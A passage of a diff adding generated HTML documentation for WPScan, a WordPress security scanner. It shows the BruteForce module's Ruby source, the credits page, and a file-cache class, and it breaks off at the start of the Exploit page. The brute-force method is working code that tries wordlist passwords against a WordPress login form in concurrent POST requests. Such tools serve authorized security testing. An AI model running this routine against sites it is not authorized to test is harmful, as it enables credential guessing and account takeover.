<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">BruteForce</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="lines_in_file-method" class="method-detail ">
<a name="method-c-lines_in_file"></a>
<div class="method-heading">
<span class="method-name">lines_in_file</span><span
class="method-args">(file_path)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Counts the number of lines in the wordlist It can take a couple of minutes
on large wordlists, although bareable.</p>
<div class="method-source-code" id="lines_in_file-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/brute_force.rb, line 114</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">lines_in_file</span>(<span class="ruby-identifier">file_path</span>)
<span class="ruby-identifier">lines</span> = <span class="ruby-value">0</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">file_path</span>, <span class="ruby-string">'r'</span>).<span class="ruby-identifier">each</span> { <span class="ruby-operator">||</span> <span class="ruby-identifier">lines</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span> }
<span class="ruby-identifier">lines</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- lines_in_file-source -->
</div>
</div><!-- lines_in_file-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="brute_force-method" class="method-detail ">
<a name="method-i-brute_force"></a>
<div class="method-heading">
<span class="method-name">brute_force</span><span
class="method-args">(logins, wordlist_path)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>param array of string logins param string wordlist_path</p>
<div class="method-source-code" id="brute_force-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/brute_force.rb, line 23</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">brute_force</span>(<span class="ruby-identifier">logins</span>, <span class="ruby-identifier">wordlist_path</span>)
<span class="ruby-identifier">hydra</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">hydra</span>
<span class="ruby-identifier">number_of_passwords</span> = <span class="ruby-constant">BruteForce</span>.<span class="ruby-identifier">lines_in_file</span>(<span class="ruby-identifier">wordlist_path</span>)
<span class="ruby-identifier">login_url</span> = <span class="ruby-identifier">login_url</span>()
<span class="ruby-identifier">found</span> = []
<span class="ruby-identifier">logins</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">login</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">queue_count</span> = <span class="ruby-value">0</span>
<span class="ruby-identifier">request_count</span> = <span class="ruby-value">0</span>
<span class="ruby-identifier">password_found</span> = <span class="ruby-keyword">false</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">wordlist_path</span>, <span class="ruby-string">&quot;r&quot;</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">password</span><span class="ruby-operator">|</span>
<span class="ruby-comment"># ignore file comments, but will miss passwords if they start with a hash...</span>
<span class="ruby-keyword">next</span> <span class="ruby-keyword">if</span> <span class="ruby-identifier">password</span>[<span class="ruby-value">0</span>,<span class="ruby-value">1</span>] <span class="ruby-operator">==</span> <span class="ruby-node">&quot;#&quot;</span>
<span class="ruby-comment"># keep a count of the amount of requests to be sent</span>
<span class="ruby-identifier">request_count</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span>
<span class="ruby-identifier">queue_count</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span>
<span class="ruby-comment"># create local vars for on_complete call back, Issue 51.</span>
<span class="ruby-identifier">username</span> = <span class="ruby-identifier">login</span>.<span class="ruby-identifier">name</span>
<span class="ruby-identifier">password</span> = <span class="ruby-identifier">password</span>
<span class="ruby-comment"># the request object</span>
<span class="ruby-identifier">request</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">login_url</span>,
{
<span class="ruby-value">:method</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">:post</span>,
<span class="ruby-value">:params</span> =<span class="ruby-operator">&gt;</span> {<span class="ruby-value">:log</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">username</span>, <span class="ruby-value">:pwd</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">password</span>},
<span class="ruby-value">:cache_timeout</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
}
)
<span class="ruby-comment"># tell hydra what to do when the request completes</span>
<span class="ruby-identifier">request</span>.<span class="ruby-identifier">on_complete</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">response</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;\n Trying Username : #{username} Password : #{password}&quot;</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@verbose</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/login_error/</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;\nIncorrect username and/or password.&quot;</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@verbose</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">302</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;\n &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">green</span>(<span class="ruby-string">&quot;[SUCCESS]&quot;</span>) <span class="ruby-operator">+</span> <span class="ruby-node">&quot; Username : #{username} Password : #{password}\n&quot;</span>
<span class="ruby-identifier">found</span> <span class="ruby-operator">&lt;&lt;</span> { <span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">username</span>, <span class="ruby-value">:password</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">password</span> }
<span class="ruby-identifier">password_found</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">timed_out?</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">red</span>(<span class="ruby-string">&quot;ERROR:&quot;</span>) <span class="ruby-operator">+</span> <span class="ruby-string">&quot; Request timed out.&quot;</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">red</span>(<span class="ruby-string">&quot;ERROR:&quot;</span>) <span class="ruby-operator">+</span> <span class="ruby-string">&quot; No response from remote server. WAF/IPS?&quot;</span>
<span class="ruby-comment"># code is a fixnum, needs a string for regex</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/^50/</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">red</span>(<span class="ruby-string">&quot;ERROR:&quot;</span>) <span class="ruby-operator">+</span> <span class="ruby-string">&quot; Server error, try reducing the number of threads.&quot;</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;\n&quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">red</span>(<span class="ruby-string">&quot;ERROR:&quot;</span>) <span class="ruby-operator">+</span> <span class="ruby-node">&quot; We recieved an unknown response for #{password}...&quot;</span>
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@verbose</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">red</span>(<span class="ruby-node">&quot;Code: #{response.code.to_s}&quot;</span>)
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">red</span>(<span class="ruby-node">&quot;Body: #{response.body}&quot;</span>)
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-comment"># move onto the next username if we have found a valid password</span>
<span class="ruby-keyword">break</span> <span class="ruby-keyword">if</span> <span class="ruby-identifier">password_found</span>
<span class="ruby-comment"># queue the request to be sent later</span>
<span class="ruby-identifier">hydra</span>.<span class="ruby-identifier">queue</span>(<span class="ruby-identifier">request</span>)
<span class="ruby-comment"># progress indicator</span>
<span class="ruby-identifier">print</span> <span class="ruby-node">&quot;\r Brute forcing user '#{username}' with #{number_of_passwords} passwords... #{(request_count * 100) / number_of_passwords}% complete.&quot;</span>
<span class="ruby-comment"># it can take a long time to queue 2 million requests,</span>
<span class="ruby-comment"># for that reason, we queue @threads, send @threads, queue @threads and so on.</span>
<span class="ruby-comment"># hydra.run only returns when it has recieved all of its,</span>
<span class="ruby-comment"># responses. This means that while we are waiting for @threads,</span>
<span class="ruby-comment"># responses, we are waiting...</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">queue_count</span> <span class="ruby-operator">&gt;=</span> <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">max_threads</span>
<span class="ruby-identifier">hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-identifier">queue_count</span> = <span class="ruby-value">0</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;Sent #{Browser.instance.max_threads} requests ...&quot;</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@verbose</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-comment"># run all of the remaining requests</span>
<span class="ruby-identifier">hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">found</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- brute_force-source -->
</div>
</div><!-- brute_force-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

175
doc/CREDITS.html Normal file
View File

@@ -0,0 +1,175 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: CREDITS [RDoc Documentation]</title>
<link type="text/css" media="screen" href="./rdoc.css" rel="stylesheet" />
<script src="./js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<p>*<b><a href="CREDITS.html">CREDITS</a></b>*</p>
<p>This file is to give credit to WPScans contributors. If you feel your name
should be in here, email ryandewhurst at gmail.</p>
<p>*WPScan Team*</p>
<p>Erwan.LR - @erwan_lr - (Project Developer) Gianluca Brindisi - @gbrindisi
(Project Developer) Ryan Dewhurst - @ethicalhack3r (Project Lead)</p>
<p>*Other Contributors*</p>
<p>Alip AKA Undead - alip.aswalid at gmail.com michee08 - Reported and gave
potential solutions to bugs. Callum Pember - Implemented proxy support -
callumpember at gmail.com g0tmi1k - Additional timthumb checks + bug
reports. Melvin Lammerts - Reported a couple of fake vulnerabilities -
melvin at 12k.nl Christian Mehlmauer - @<em>FireFart</em> - Theme
enumeration</p>
</div>
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

461
doc/CacheFileStore.html Normal file
View File

@@ -0,0 +1,461 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: CacheFileStore</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/cache_file_store_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/cache_file_store.rb">lib/cache_file_store.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-clean">#clean</a></li>
<li><a href="#method-i-get_entry_file_path">#get_entry_file_path</a></li>
<li><a href="#method-i-read_entry">#read_entry</a></li>
<li><a href="#method-i-write_entry">#write_entry</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">CacheFileStore</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="serializer-attribute-method" class="method-detail">
<a name="serializer"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">serializer</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="storage_path-attribute-method" class="method-detail">
<a name="storage_path"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">storage_path</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(storage_path, serializer = Marshal)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>The serializer must have the 2 methods .load and .dump (Marshal and YAML
have them) YAML is Human Readable, contrary to Marshal which store in a
binary format Marshal does not need any “require”</p>
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/cache_file_store.rb, line 34</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">storage_path</span>, <span class="ruby-identifier">serializer</span> = <span class="ruby-constant">Marshal</span>)
<span class="ruby-ivar">@storage_path</span> = <span class="ruby-constant">File</span>.<span class="ruby-identifier">expand_path</span>(<span class="ruby-identifier">storage_path</span>)
<span class="ruby-ivar">@serializer</span> = <span class="ruby-identifier">serializer</span>
<span class="ruby-comment"># File.directory? for ruby &lt;= 1.9 otherwise, it makes more sense to do Dir.exist? :/</span>
<span class="ruby-keyword">unless</span> <span class="ruby-constant">File</span>.<span class="ruby-identifier">directory?</span>(<span class="ruby-ivar">@storage_path</span>)
<span class="ruby-constant">Dir</span>.<span class="ruby-identifier">mkdir</span>(<span class="ruby-ivar">@storage_path</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="clean-method" class="method-detail ">
<a name="method-i-clean"></a>
<div class="method-heading">
<span class="method-name">clean</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="clean-source">
<pre>
<span class="ruby-comment"># File lib/cache_file_store.rb, line 44</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">clean</span>
<span class="ruby-constant">Dir</span>[<span class="ruby-constant">File</span>.<span class="ruby-identifier">join</span>(<span class="ruby-ivar">@storage_path</span>, <span class="ruby-string">'*'</span>)].<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">f</span><span class="ruby-operator">|</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">delete</span>(<span class="ruby-identifier">f</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- clean-source -->
</div>
</div><!-- clean-method -->
<div id="get_entry_file_path-method" class="method-detail ">
<a name="method-i-get_entry_file_path"></a>
<div class="method-heading">
<span class="method-name">get_entry_file_path</span><span
class="method-args">(key)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="get_entry_file_path-source">
<pre>
<span class="ruby-comment"># File lib/cache_file_store.rb, line 66</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_entry_file_path</span>(<span class="ruby-identifier">key</span>)
<span class="ruby-ivar">@storage_path</span> <span class="ruby-operator">+</span> <span class="ruby-string">'/'</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">key</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_entry_file_path-source -->
</div>
</div><!-- get_entry_file_path-method -->
<div id="read_entry-method" class="method-detail ">
<a name="method-i-read_entry"></a>
<div class="method-heading">
<span class="method-name">read_entry</span><span
class="method-args">(key)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="read_entry-source">
<pre>
<span class="ruby-comment"># File lib/cache_file_store.rb, line 50</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">read_entry</span>(<span class="ruby-identifier">key</span>)
<span class="ruby-identifier">entry_file_path</span> = <span class="ruby-identifier">get_entry_file_path</span>(<span class="ruby-identifier">key</span>)
<span class="ruby-keyword">if</span> <span class="ruby-constant">File</span>.<span class="ruby-identifier">exists?</span>(<span class="ruby-identifier">entry_file_path</span>)
<span class="ruby-keyword">return</span> <span class="ruby-ivar">@serializer</span>.<span class="ruby-identifier">load</span>(<span class="ruby-constant">File</span>.<span class="ruby-identifier">read</span>(<span class="ruby-identifier">entry_file_path</span>))
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- read_entry-source -->
</div>
</div><!-- read_entry-method -->
<div id="write_entry-method" class="method-detail ">
<a name="method-i-write_entry"></a>
<div class="method-heading">
<span class="method-name">write_entry</span><span
class="method-args">(key, data_to_store, cache_timeout)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="write_entry-source">
<pre>
<span class="ruby-comment"># File lib/cache_file_store.rb, line 58</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">write_entry</span>(<span class="ruby-identifier">key</span>, <span class="ruby-identifier">data_to_store</span>, <span class="ruby-identifier">cache_timeout</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">cache_timeout</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">get_entry_file_path</span>(<span class="ruby-identifier">key</span>), <span class="ruby-string">'w'</span>) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">f</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">f</span>.<span class="ruby-identifier">write</span>(<span class="ruby-ivar">@serializer</span>.<span class="ruby-identifier">dump</span>(<span class="ruby-identifier">data_to_store</span>))
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- write_entry-source -->
</div>
</div><!-- write_entry-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

891
doc/Exploit.html Normal file
View File

@@ -0,0 +1,891 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Exploit</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
